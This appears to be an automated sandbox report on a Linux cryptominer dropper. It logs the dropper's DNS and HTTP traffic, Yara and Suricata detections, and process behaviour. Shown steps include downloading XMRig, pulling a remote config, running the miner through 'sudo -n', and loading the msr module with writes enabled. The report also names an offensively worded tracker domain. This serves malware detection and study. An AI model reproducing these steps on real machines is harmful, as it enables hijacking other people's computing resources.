writetocharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalavx512fos/execruntimemodulesvboxdrvCLOSINGENOEXECENOTBLKENOTDIRETXTBSYEDEADLKEUNATCHEBADRQCEBADSLTENODATAEREMOTEENOLINKEDOTDOTEBADMSGEREMCHGELIBACCELIBBADELIBSCNELIBMAXENOTSUPENOBUFSEISCONNEUCLEANENOTNAMENAVAILERFKILLSIGQUITSIGTRAPSIGABRTSIGKILLSIGUSR1SIGSEGVSIGUSR2SIGPIPESIGALRMSIGTERMSIGCHLDSIGCONTSIGSTOPSIGTSTPSIGTTINSIGTTOUSIGXCPUSIGXFSZSIGPROFInstAltInstNopalt -> nop -> any -> SHA-224SHA-256SHA-384SHA-512DES-CBCEd25519MD2-RSAMD5

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	Reads hosts file: /etc/hosts			Jump to behavior
Source: /usr/bin/sudo (PID: 6268)	Reads hosts file: /etc/hosts			Jump to behavior
Source: /usr/bin/sudo (PID: 6294)	Reads hosts file: /etc/hosts			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads hosts file: /etc/hosts			Jump to behavior

Source: Network traffic	Suricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.23:35974 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.23:60473 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1Host: api.ipify.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/d0ce794d-b593-4f8f-bb2d-6bfa0096266b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240921%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240921T192613Z&X-Amz-Expires=300&X-Amz-Signature=80393b2b793a967ba4d37dd68c49bfeda55a294590d9408a22cbca38042700a2&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-linux-static-x64.tar.gz&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gzAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /spetterman66/verynicerepo/main/config.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: vmtracker.freechildporninthisserver.lol
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: pool.supportxmr.com
Source: global traffic	DNS traffic detected: DNS query: pool-fr.supportxmr.com

Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0B1
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.accv.es00
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://api.ipify.org?format=text
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://api.ipify.org?format=textcpu1
Source: xmrig.12.dr	String found in binary or memory: https://gcc.gnu.org/bugsrg/bugs/):
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/d0ce794d-b593-
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json0E1
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://vmtracker.freechildporninthisserver.lol/postgresqlstore
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://vmtracker.freechildporninthisserver.lol/postgresqlstoresoftirq
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://www.ubuntu.com/legal/terms-and-policies/privacy-policy
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: xmrig.12.dr	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: xmrig.12.dr	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: xmrig.12.dr	String found in binary or memory: https://xmrig.com/wizard
Source: xmrig.12.dr	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 60334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32840
Source: unknown	Network traffic detected: HTTP traffic on port 57756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60334
Source: unknown	Network traffic detected: HTTP traffic on port 40456 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40456

System Summary

Malicious sample detected (through community Yara rule)

Source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: classification engine

Classification label: mal96.troj.evad.mine.linELF@0/6@59/0

Source: ELF file section

Submission: xmr_linux_amd64 (2).elf

Persistence and Installation Behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)

File: /proc/6295/mounts

Jump to behavior

Source: /usr/bin/sudo (PID: 6268)	File: /home/saturnino/.sudo_as_admin_successful			Jump to behavior
Source: /usr/bin/sudo (PID: 6294)	File: /home/saturnino/.sudo_as_admin_successful			Jump to behavior

Source: /usr/bin/sudo (PID: 6294)

Empty hidden file: /home/saturnino/.sudo_as_admin_successful

Jump to behavior

Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1582/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1582/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1582/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/3088/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/230/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/230/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/230/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/110/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/110/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/110/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/231/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/231/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/231/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/111/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/111/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/111/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/232/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/232/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/232/status			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/232/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1579/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1579/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1579/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/112/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/112/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/112/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/233/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/233/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/233/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1699/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/113/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/113/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/113/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/234/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/234/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/234/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1335/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1698/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/114/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/114/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/114/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/235/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/235/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/235/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1334/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1576/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1576/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/1576/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/2302/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/115/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/115/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/115/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/236/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/236/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/236/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/116/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/116/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/116/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/237/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/237/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/237/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/117/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/117/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/117/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/118/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/118/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/118/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/910/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/910/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/910/status			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/910/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/119/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/119/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/119/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/912/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/912/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/912/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/10/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/10/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/10/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/2307/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/11/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/11/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/11/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/918/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/918/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/918/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/12/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/12/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/12/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/13/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/13/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/13/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/6243/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/14/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/14/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/14/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/6242/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/15/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/15/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/15/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/16/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/16/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/16/cmdline			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/17/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/17/comm			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	File opened: /proc/17/cmdline			Jump to behavior

Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6304)

Shell command executed: sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"

Jump to behavior

Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6268)	Sudo executable: /usr/bin/sudo -> sudo -n true			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6294)	Sudo executable: /usr/bin/sudo -> sudo -n /tmp/xmrig/xmrig-6.21.3/xmrig			Jump to behavior

Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	Reads from proc file: /proc/stat			Jump to behavior
Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	Reads from proc file: /proc/cpuinfo			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads from proc file: /proc/cpuinfo			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads from proc file: /proc/meminfo			Jump to behavior

Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)

File: /tmp/xmrig/xmrig-6.21.3/xmrig (bits: - usr: rwx grp: rwx all: rwx)

Jump to behavior

Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)

File written: /tmp/xmrig/xmrig-6.21.3/xmrig

Jump to dropped file

Source: /bin/sh (PID: 6305)

Modprobe: /sbin/modprobe -> /sbin/modprobe msr allow_writes=on

Jump to behavior

Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	Reads CPU info from proc file: /proc/cpuinfo			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from proc file: /proc/cpuinfo			Jump to behavior

Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/online			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpus			Jump to behavior
